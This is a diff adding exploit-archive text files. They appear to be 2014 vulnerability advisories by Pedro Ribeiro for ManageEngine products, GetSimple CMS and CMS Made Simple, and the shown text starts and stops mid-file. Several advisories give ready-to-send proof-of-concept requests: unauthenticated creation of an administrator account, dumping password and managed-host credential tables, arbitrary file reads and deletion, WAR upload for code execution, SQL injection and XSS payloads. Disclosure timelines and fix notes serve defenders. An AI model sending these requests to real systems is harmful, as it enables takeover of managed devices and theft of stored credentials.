mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration." + +These products have managed service providers (MSP) versions which are used to control the desktops and smartphones of several clients. +Quoting the author of the Internet Census 2012: "As a rule of thumb, if you believe that "nobody would connect that to the Internet, really nobody", there are at least 1000 people who did." +These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows or as the user in Linux. Needless to say, owning a Desktop Central / IT360 box will give you control of all the computers and smartphones it manages, while owning Password Manager Pro will give you a treasure trove of passwords. + +>> Technical details: +The two blind SQL injections described below have been present in Desktop Central, Password Manager Pro and IT360 in all releases since 2006. They can only be triggered via a GET request, which means you can only inject around 8000 characters at a time. + +#1 +Vulnerability: +Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP / authenticated on IT360) +CVE-2014-3996 + +Affected products / versions: +- ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to v9 build 90033 +- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002 +- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110 +This affects all versions of the products released since 19-Apr-2006. Other ManageEngine products might be affected. +Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330 + +Constraints: +- DC: no authentication or any other information needed +- PMP: no authentication or any other information needed +- IT360: valid user account needed + +Proof of concept: + +DC / PMP: +GET /LinkViewFetchServlet.dat?sv=[SQLi] + +IT360: +GET /console/LinkViewFetchServlet.dat?sv=[SQLi] + + +#2 +Vulnerability: +Blind SQL injection in MetadataServlet (unauthenticated on PMP / authenticated on IT360) +CVE-2014-3997 + +Affected products / versions: +- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002 +- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110 +This affects all versions of the products released since 03-Apr-2008. Other ManageEngine products might be affected. +Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330 + +Constraints: +- PMP: no authentication or any other information needed +- IT360: valid user account needed + +Proof of concept: + +PMP: +GET /MetadataServlet.dat?sv=[SQLi] + +IT360: +GET /console/MetadataServlet.dat?sv=[SQLi] + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/multiple/webapps/43892.txt b/exploits/multiple/webapps/43892.txt new file mode 100644 index 000000000..590271322 --- /dev/null +++ b/exploits/multiple/webapps/43892.txt @@ -0,0 +1,52 @@ +>> Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +================================================================================= +Disclosure: 31/12/2014 / Last updated: 05/01/2015 + +>> Background on the affected product: +"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more." + +This vulnerability is being released as a 0day since ManageEngine failed to take action after 112 days. See timeline for details. + +>> Technical details: +Vulnerability: Administrator account creation (unauthenticated) +CVE-2014-7862 +Constraints: none; no authentication or any other information needed +Affected versions: all versions from v7 onwards + +GET /servlets/DCPluginServelet?action=addPlugInUser&role=DCAdmin&userName=dcpwn&email=bla@bla.com&phNumber=123456&password=8fR%2bRoOURmY0EXsX%2bCmung%3d=&salt=1401192012599&createdtime=1337 + +This creates a new administrator user "dcpwn" with the password "admin". You can now execute code on all devices managed by Desktop Central! +A Metasploit auxiliary module that exploits this vulnerability has been released. + +>> Fix: +(updated 05/01/2015) Upgrade to version 9.0 build 90109 or later. + +This vulnerability was initially disclosed on 31/12/2014 as a 0-day, as ManageEngine failed to take action after 112 days. + +Timeline of disclosure: +11/09/2014: +- Vulnerability information sent to Romanus, Desktop Central project manager. + +23/09/2014: +- Requested an update. Received reply "My development team is working on this to provide a fix. Let me check this and update you the status." + +17/10/2014 +- Requested an update. Received reply on the 19th "Due to festive season here i'm unable to get the update. Let me find this and update you by Monday." + +30/10/2014 +- Requested an update. Received reply "The development and testing of the reported part should get over in another 3 weeks and when it is ready for release build I'll send it for testing." + +23/11/2014 +- Requested an update. Received reply on the 24th "I was traveling hence couldn't give you an update. It should get released by next week or early second week. I'll send you an update on this." + +15/12/2014 +- Requested an update. Received reply on the 18th "it has been handled from the Desktop Central side and awaiting for the release". + +31/12/2014 +- Released information and exploit 112 days after initial disclosure. + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/multiple/webapps/43893.txt b/exploits/multiple/webapps/43893.txt new file mode 100644 index 000000000..7ca0aaa52 --- /dev/null +++ b/exploits/multiple/webapps/43893.txt @@ -0,0 +1,73 @@ +>> Multiple vulnerabilities in ManageEngine EventLog Analyzer +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +========================================================================== +Disclosure: 05/11/2014 / Last updated: 05/11/2014 + +>> Background on the affected product: +"EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more." + + +>> Technical details: +#1 +Vulnerability: SQL database information disclosure (read any table in the database) +CVE-2014-6038 +Constraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/. +Affected versions: all versions from v7 to v9.9 build 9002. + +GET /agentHandler?mode=getTableData&table=[tableName] +GET /agentHandler?mode=getTableData&table=AaaUser --> user logins +GET /agentHandler?mode=getTableData&table=AaaPassword --> user passwords (MD5 hashed) and salts +GET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user password hints +GET /agentHandler?mode=getTableData&table=HostDetails --> Windows / AS/400 managed hosts Administrator usernames and passwords (XOR'ed with 0x30) + + +#2 +Vulnerability: Windows / AS/400 managed hosts Administrator credentials disclosure +CVE-2014-6039 +Constraints: none; no authentication or any other information needed. On v7 the url has to be prepended with /event/. +Affected versions: all versions from v7 to v9.9 build 9002. + +GET /hostdetails?slid=X&hostid=Y +GET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser username and password (XOR'ed with 0x30 and base64 encoded) + + +A Metasploit exploit that abuses these two vulnerabilities to obtain the managed device superuser credentials has been released. + + +>> Fix: +UNFIXED - ManageEngine failed to take action after 70 days. + +Timeline of disclosure: +28/08/2014 +- Requested contact to email via ManageEngine Security Response Center +- Received email from support and sent details about the vulnerabilities above and a third vulnerability (remote code execution via file upload). + +28/08/2014 +- ManageEngine acknowledge the receipt and promise to keep me informed of the progress. + +31/08/2014 +- hong10 releases details about the remote code execution via file upload vulnerability which I had discovered. Apparently he discovered and communicated it to ManageEngine over a year ago and no action had been taken (see http://seclists.org/fulldisclosure/2014/Aug/86). +- I ask ManageEngine why I hadn't been informed that one of my vulnerabilities had already been disclosed to them over a year ago. They respond with "We appreciate your efforts and will fix your vulnerabilities, please bear with us". +- With hong10's support, I release an exploit for the remote code execution vulnerability (see http://seclists.org/fulldisclosure/2014/Aug/88). I also remove the vulnerability information from this report since it has already been discovered and disclosed by hong10. + +11/09/2014 +- Asked for an update on progress. Received a response a day after "the development team will include the fix in our next release". + +13/10/2014 +- Asked for an update on progress. No response. + +17/10/2014 +- Informed ManageEngine that will release details and an exploit the next day if no reply is received. + +19/10/2014 +- Attempted escalation via the project manager for Desktop Central. EventLog support team replies on the next day apologising for not responding and saying will get back to me as soon as possible. + +05/11/2014 +- Informed EventLog support that would release details and exploit today. Received reply stating "we are working on this but cannot commit to a date; the new version has a tentative release date of end of quarter". +- Released advisory and exploit 70 days after initial contact (interesting fact: it's been 67 days since the release of my exploit for hong10's vulnerability and EventLog Analyzer is still vulnerable to remote code execution). + + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/multiple/webapps/43894.txt b/exploits/multiple/webapps/43894.txt new file mode 100644 index 000000000..875c768c8 --- /dev/null +++ b/exploits/multiple/webapps/43894.txt @@ -0,0 +1,59 @@ +>> Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360 +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +========================================================================== +Disclosure: 28/01/2015 / Last updated: 09/02/2015 + +>> Background on the affected products: +"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation." + +"ManageEngine Applications Manager is a comprehensive application monitoring software used to monitor heterogeneous business applications such as web applications, application servers, web servers, databases, network services, systems, virtual systems, cloud resources, etc. It provides remote business management to the applications or resources in the network. It is a powerful tool for system and network administrators, helping them monitor any number of applications or services running in the network without much manual effort." + +"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration." + + +>> Technical details: +The affected servlet is the "FailOverHelperServlet" (affectionately called FailServlet). +There are definitely more vulnerabilities than the ones identified below - for example it is possible to hijack the failover operation completely. The ones listed below as the easy ones to find and exploit. + + +#1 +Vulnerability: Arbitrary file download +CVE-2014-7863 +Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360 +Affected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5 + +POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini + + +#2 +Vulnerability: Information disclosure - list all files in a directory and its children +CVE-2014-7863 (same as #1) +Constraints: unauthenticated in OpManager and AppManager; authenticated in IT360 +Affected versions: ManageEngine Applications Manager v? to v11.9 b11911; ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5 + +POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\ + + +#3 +Vulnerability: Blind SQL injection +CVE-2014-7864 +Affected versions: ManageEngine OpManager v8 - v11.5; IT360 v? to v10.5 +Constraints: unauthenticated in OpManager; authenticated in IT360 +POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2] +POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a + + +>> Fix: +For Applications Manager, upgrade to version 11.9 b11912. + +For OpManager, install the patch for v11.4 and 11.5: +https://support.zoho.com/portal/manageengine/helpcenter/articles/vulnerabilities-in-failoverhelperservlet +Version 11.6 will be released with the patch. + +These vulnerabilities remain UNFIXED in IT360. + + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/multiple/webapps/43895.txt b/exploits/multiple/webapps/43895.txt new file mode 100644 index 000000000..cece5655b --- /dev/null +++ b/exploits/multiple/webapps/43895.txt @@ -0,0 +1,67 @@ +>> Arbitrary file download in ManageEngine Netflow Analyzer and IT360 +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +========================================================================== +Disclosure: 30/11/2014 / Last updated: 3/12/2014 + +>> Background on the affected product: +"NetFlow Analyzer, a complete traffic analytics tool, leverages flow technologies to provide real time visibility into the network bandwidth performance. NetFlow Analyzer, primarily a bandwidth monitoring tool, has been optimizing thousands of networks across the World by giving holistic view about their network bandwidth and traffic patterns. NetFlow Analyzer is a unified solution that collects, analyzes and reports about what your network bandwidth is being used for and by whom." + +"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration." + +This is being released as a 0-day because ManageEngine have been twiddling their thumbs (and making a fool out of me) for 105 days. See timeline below for explanation. + + +>> Technical details: +Vulnerability: Arbitrary file download +Constraints: unauthenticated in NetFlow; authenticated in IT360 +Affected versions: NetFlow v8.6 to v10.2; at least IT360 v10.3 and above + +CVE-2014-5445: +GET /netflow/servlet/CSVServlet?schFilePath=/etc/passwd +GET /netflow/servlet/CReportPDFServlet?schFilePath=C:\\boot.ini&pdf=true + +CVE-2014-5446 +GET /netflow/servlet/DisplayChartPDF?filename=../../../../boot.ini + +All 3 servlets can be exploited in both Windows and Linux. A Metasploit module that exploits CVE-2014-5445 has been released. + + +>> Fix: +UNFIXED - ManageEngine failed to take action after 105 days. + +Timeline of disclosure: +18/08/2014 +- Requested contact via ManageEngine Security Response Center. + +19/08/2014 +- Received contact from the NetFlow Analyzer support team. Responded with the security advisory above detailing the vulnerabilities. +- Further back and forth explaining the vulnerabilities, how to exploit them and their impact. + +22/08/2014 +- Requested information regarding the release date for the fix. Received response "We do not have a ETA on this, I will check with our engineering team and update you." + +22/09/2014 +- Requested information regarding the release date for the fix. Received response "We expect that the new release will be within the next couple of weeks". + +20/10/2014 +- Requested information regarding the release date for the fix. Received response "Our new release will be happening early by next week, you can get the update in our NetFlow Analyzer website". +- Asked if they are sure that the fix will be included in the new release. Received response "yes you are correct, the issue that you have specified is fixed in new release". + +27/10/2014 +- NetFlow Analyzer version 10.2 released - still vulnerable. +- Sent an email to ManageEngine asking if they are going to release a fix soon. Received response "We will release the PPM file of the upgrade soon, in which we have fixed the Vulnerability you mentioned". + +5/11/2014 +- Requested information regarding the release date for the fix. Received response "You can expect the release before this month end". + +28/11/2014 +- Requested information regarding the release date for the fix. Received response "The PPM file is in testing phase and will be released in next Month". +- Asked if they can commit to a date. Received response "the ppm is in testing phase now, as it is one of the major release, we will not be able to give an exact date of release". + +30/11/2014 +- Realised that ManageEngine have been playing me for 105 days, and immediately released advisory and exploit. + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/multiple/webapps/43896.txt b/exploits/multiple/webapps/43896.txt new file mode 100644 index 000000000..3e4775e6a --- /dev/null +++ b/exploits/multiple/webapps/43896.txt @@ -0,0 +1,94 @@ +>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 +>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security +========================================================================== +Disclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014 + +>> Background on the affected products: +"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation." + +"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly." + +"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration." + + +>> Technical details: +#1 +Vulnerability: Remote code execution via WAR file upload +Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360 + +a) +CVE-2014-6034 +POST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war +<... WAR file payload ...> +Affected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4 +A Metasploit module that exploits this vulnerability has been released. + +b) +CVE-2014-6035 +POST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war +<... WAR file payload ...> + +Affected versions: OpManager v? to v11.4 + + +#2 +Vulnerability: Arbitrary file deletion +CVE-2014-6036 +Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360 +Affected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4 + +POST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini + + +#3 +Vulnerability: Remote code execution via file upload +CVE-2014-7866 +Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360 + +a) +POST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00 +<... WAR file payload ...> + +Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0 + +b) +POST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00 +<... WAR file payload ...> + +Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0 + + +#4 +Vulnerability: Blind SQL injection +CVE-2014-7868 +Constraints: unauthenticated on OpManager and Social IT; authenticated in IT360 + +a) +POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi] +POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+ +Affected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0) + +b) +POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db! +POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text) +Affected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0) + + +>> Fix: +Upgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C]. +This patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4). +The fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released. + +[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix +Resolves #1 and #2 + +[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix +Resolves #3 + +[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability +Resolves #4 + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/php/webapps/43888.txt b/exploits/php/webapps/43888.txt new file mode 100644 index 000000000..a0a7b1abb --- /dev/null +++ b/exploits/php/webapps/43888.txt @@ -0,0 +1,32 @@ +PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1 +CVE-2014-1603 +by Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security +Disclosure: 12/05/2014 / Last updated: 12/10/2014 + +Timeline: + 04/11/2013 - Found bugs, produced proof of concept. + 05/11/2013 - Communicated to the developer, which acknowledged receipt. + 10/01/2014 - Politely asked the developer for progress, no response. + 17/01/2014 - Received CVE number from MITRE. + 20/01/2014 - Communicated CVE number to the developer, no response. + 29/01/2014 - Politely asked the developer for progress, no response. + 12/05/2014 - Public release. +============================== + +Reflected XSS in plugin load page: + http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data¶m="> + +Persistent XSS in settings page: +
+ "> + "> + "> + + +
+ + +================ +Agile Information Security Limited +http://www.agileinfosec.co.uk/ +>> Enabling secure digital business >> \ No newline at end of file diff --git a/exploits/php/webapps/43889.txt b/exploits/php/webapps/43889.txt new file mode 100644 index 000000000..6ad88580a --- /dev/null +++ b/exploits/php/webapps/43889.txt @@ -0,0 +1,278 @@ +> Vulnerabilities in CMS Made Simple, version 1.11.9 +> Discovered by Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security +> Reported to ted@cmsmadesimple.org and calguy1000@cmsmadesimple.org + +Disclosure: 28/02/2014 / Last updated: 12/10/2014 + +CMS Made Simple, an open source content management system, allows for faster and easier management of website content. This CMS is scalable for small businesses to large corporations. + +TL;DR: +XSS in admin console, weak CSRF protection and a possible PHP object insertion via unserialize. + +These vulnerabilities were considered unimportant by the CMS Made Simple developers. Their reasoning was that they had to be exploited by a logged in administrator user who is a trusted user anyway. When I explained to them that with XSS all you need to do is send a malicious link to the administrator, they responded back saying that they are confident in their CSRF protection. I then sent them an analysis of their CSRF protection (at the bottom of this advisory), which I found to be quite weak. Finally they commited to implement a half-assed mitigation for the CSRF token weakness but said they will not fix the other issues. + + +Timeline: +- 27.11.2013: Initial contact to the emails listed in www.cmsmadesimple.com. No reply. +- 03.12.2013: Message posted in the www.cmsmadesimple.com public forum asking to contact me back. A few hours later I was contacted by calguy and sent him a more complete version of this advisory with recommendations. +- 09.12.2013: calguy responds saying these will not be fixed as you have to be an admin user anyway. +- 13.12.2013: After a few days arguing over email, Robert Campbell, CMS Made Simple project manager, responds with an official note saying they will double the CSRF token length in a future release but will not fix the rest of the issues. +- 14.12.2013: Handed over to CERT asking for help to try to reason with the CMS Made Simple developers. +- 28.02.2014: Public disclosure by CERT + + +==================================================================== +Vulnerability: Persistent cross site scripting (XSS) in add* pages (CVE-2014-0334) +File(line): cmsmadesimple/admin/addgroup.php(107) +File(line): cmsmadesimple/admin/addhtmlblob.php(165) +File(line): cmsmadesimple/admin/addbookmark.php(92/96) + +Code snippet: + +addgroup.php: +$group= ""; +if (isset($_POST["group"])) $group = $_POST["group"]; + +... +
+

*:

+

+ +addhtmlblob.php: +$htmlblob = ""; +if (isset($_POST['htmlblob'])) $htmlblob = trim($_POST['htmlblob']); + +... + +
+

*:

+

+
+ +addbookmark.php: +$title= ""; +if (isset($_POST["title"])) $title = $_POST["title"]; +$url = ""; +if (isset($_POST["url"])) $url = $_POST["url"]; + +... + + +
+
+

:

+

+
+
+

:

+

+
+ +Comment: +addgroup.php: "group" parameter is written directly onto the page without validation. +addhtmlblob.php: "htmlblob" parameter is written directly onto the page without validation. +addbookmark.php: "title" and "url" parameters are written directly onto the page without validation. + +Proof-of-concept: +addgroup.php: (POST) _sx_=39d304b1&group=&active=on&addgroup=true +addhtmlblob.php: (POST) _sx_=39d304b1&htmlblob=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&use_wysiwyg=0&use_wysiwyg=1&content=asas&description=ddd&addhtmlblob=true&submit2=Submit +addbookmark.php: (POST) title=">&url=">&addbookmark=true + +NOTE: this will also cause XSS in the respective list* pages. + +==================================================================== +Vulnerability: Persistent cross site scripting (XSS) in copy* pages (CVE-2014-0334) +File(line): cmsmadesimple/admin/copystylesheet.php(117) +File(line): cmsmadesimple/admin/copytemplate.php(160) +Code snippet: + +copystylesheet.php: +$stylesheet_name = ''; +if (isset($_REQUEST["stylesheet_name"])) { $stylesheet_name = $_REQUEST["stylesheet_name"]; } + +... +
+

:

+

+
+ +copytemplate.php: +
+

:

+

+
+ +Comment: +copystylesheet.php: "stylesheet_name" parameter is written directly onto the page without validation. +copytemplate.php: "template_name" parameter is written directly onto the page without validation. + +Proof-of-concept: +copystylesheet.php: (POST) _sx_=39d304b1&stylesheet=%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&stylesheet_id=32©stylesheet=true +copytemplate.php: (POST) _sx_=39d304b1&template=%22%3E%3Cscript%3Ealert%2825%29%3C%2Fscript%3E&template_id=15©template=true&from=listtemplates.php%3F_sx_%3D39d304b1 + +NOTE: this will also cause XSS in the respective list* pages. + +==================================================================== +Vulnerability: Persistent cross site scripting (XSS) in list* pages (CVE-2014-0334) +File(line): cmsmadesimple/admin/addtemplate.php(117) +File(line): cmsmadesimple/admin/listtemplates.php(188) +File(line): cmsmadesimple/admin/addcss.php(65-156) +File(line): cmsmadesimple/admin/listcss.php(172) + +Code snippet: + +addtemplate.php: +$template = ""; +if (isset($_POST["template"])) $template = $_POST["template"]; +... +audit($newtemplate->id, 'HTML-template: '.$template, 'Added'); + +listtemplates.php: +if ($counter < $page*$limit && $counter >= ($page*$limit)-$limit) { + echo "\n"; | template name shown below + echo "id."\">".$onetemplate->name."\n"; + echo "".($onetemplate->default == 1?$default_true:$default_false)."\n"; + +addcss.php: +# then its name +$css_name = ""; +if (isset($_POST["css_name"])) $css_name = $_POST["css_name"]; + +// Now clean up name +$css_name = htmlspecialchars($css_name, ENT_QUOTES); + ^ HTML encoded here, but stored in the database + +... + $newstylesheet->name = $css_name; +... + $result = $newstylesheet->Save(); + +listcss.php: +// if user has right to delete +if ($delcss) + { + echo ""; <--- HTML decoded here + echo $themeObject->DisplayImage('icons/system/delete.gif', lang('delete'),'','','systemicon'); + echo "\n"; + } + + +Comment: +addtemplate.php: The "template" parameter is encoded properly in addtemplate.php, but stored in the database and displayed as part of HTML output in listtemplates.php. +addcss.php: The "css_name" parameter is encoded properly in addcss.php, but stored in the database and displayed as part of HTML output in listcss.php. + +Proof-of-concept: +addtemplate.php: (POST) template=%22%3E%3Cscript%3Ealert%2822%29%3C%2Fscript%3E&content=%7Bprocess_pagedata%7D%3C%21DOCTYPE+html+PUBLIC+%22-%2F%2FW3C%2F%2FDTD+XHTML+1.0+Transitional%2F%2FEN%22+%22http%3A%2F%2Fwww.w3.org%2FTR%2Fxhtml1%2FDTD%2Fxhtml1-transitional.dtd%22%3E%0D%0A%3Chtml+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%22+xml%3Alang%3D%22en%22+%3E%0D%0A%3Chead%3E%0D%0A%3Ctitle%3E%7Bsitename%7D+-+%7Btitle%7D%3C%2Ftitle%3E%0D%0A%7Bmetadata%7D%0D%0A%7Bcms_stylesheet%7D%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3E%0D%0A%0D%0A%3C%21--+start+header+--%3E%0D%0A%3Cdiv+id%3D%22header%22%3E%0D%0A++%3Ch1%3E%7Bsitename%7D%3C%2Fh1%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+header+--%3E%0D%0A%0D%0A%3C%21--+start+menu+--%3E%0D%0A%3Cdiv+id%3D%22menu%22%3E%0D%0A++%7Bmenu%7D%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+menu+--%3E%0D%0A%0D%0A%3C%21--+start+content+--%3E%0D%0A%3Cdiv+id%3D%22content%22%3E%0D%0A++%3Ch1%3E%7Btitle%7D%3C%2Fh1%3E%0D%0A++%7Bcontent%7D%0D%0A%3C%2Fdiv%3E%0D%0A%3C%21--+end+content+--%3E%0D%0A%0D%0A%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A&active=on&addtemplate=true&submit=Submit +listcss.php: (POST) css_name=">&css_text=b&media_query=c&addcss=true + +==================================================================== +Vulnerability: Persistent cross site scripting (XSS) in edit* pages (CVE-2014-0334) +File(line): cmsmadesimple/admin/editbookmark.php(117/121) + +Important note: due to lack of time I could not test the other edit* pages, but looking at the code quickly they seem vulnerable. +I suspect the following are also vulnerable: +editcontent.php +editcss.php +editevent.php +editgroup.php +edithtmlblob.php +edittemplate.php +edituser.php +edituserplugin.php + +Code snippet: + +editbookmark.php: +$title = ""; +if (isset($_POST["title"])) $title = $_POST["title"]; + +$myurl = ""; +if (isset($_POST["url"])) $myurl = $_POST["url"]; + +... + +
+

:

+

+
+
+

:

+

+
+ +Comment: +editbookmark.php: "title" and "url" parameters are written directly onto the page without validation. + +Proof-of-concept: +editbookmark.php: (POST) _sx_=39d304b1&title=">&url=">&bookmark_id=6&editbookmark=true&userid=1 + +NOTE: this will also cause XSS in the respective list* pages. + +==================================================================== +Vulnerability: Reflected cross site scripting (XSS) in message parameter (CVE-2014-0334) +File(line): cmsmadesimple/admin/listcss.php(61) +File(line): cmsmadesimple/admin/listtemplates.php(49) +File(line): cmsmadesimple/admin/listusers.php(42) +File(line): cmsmadesimple/admin/listhtmlblobs.php(45) +File(line): cmsmadesimple/admin/listcssassoc.php(167) +File(line): cmsmadesimple/admin/templatecss.php(107) + +Code snippet: +(from listcss.php) +#****************************************************************************** +# first : displaying error message, if any. +#****************************************************************************** +if (isset($_GET["message"])) { + $message = preg_replace('/\

'.$message.'

'; + +Comment: +Could not exploit the "message" param properly, as the regex strips the "<". Might be doable by someone smarter that knows how to play with encodings properly? + +Proof-of-concept: +(GET) http://192.168.56.101/cmsmadesimple/admin/listcss.php?_sx_=39d304b1&message=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E + + +====================================================================== +Vulnerability: Cross Site Request Forgery +File(line): application wide + +Comment: +The application contains a weak CSRF protection. The CSRF token is called "user key" and is named "_sx_", and is attributed to a user per session. +- Tokens are included in the URL in HTTP GET requests +- Tokens are also included in many Referral headers upon redirect, making them accessible to JavaScript +- Tokens are only 8 characters long (and alphanumeric only), meaning they are easy to bruteforce +- Getting a token wrong does not seem to kill the user session, making bruteforce feasible +NOTE: Version 1.11.10 doubles the character length to 16 characters which helps with bruteforce. However the application still leaks the CSRF tokens where it shouldn't, allowing them to be easily extracted in combination wit the XSS flaws. + + +References: +https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet + + +==================================================================== +Vulnerability: PHP Object Insertion +File(line): cmsmadesimple/admin/changegroupperm.php(115) +Code snippet: + + $selected_groups = unserialize(base64_decode($_POST['sel_groups'])); + $query = 'DELETE FROM '.cms_db_prefix().'group_perms + WHERE group_id IN ('.implode(',',$selected_groups).')'; + $db->Execute($query); + + +Comment: 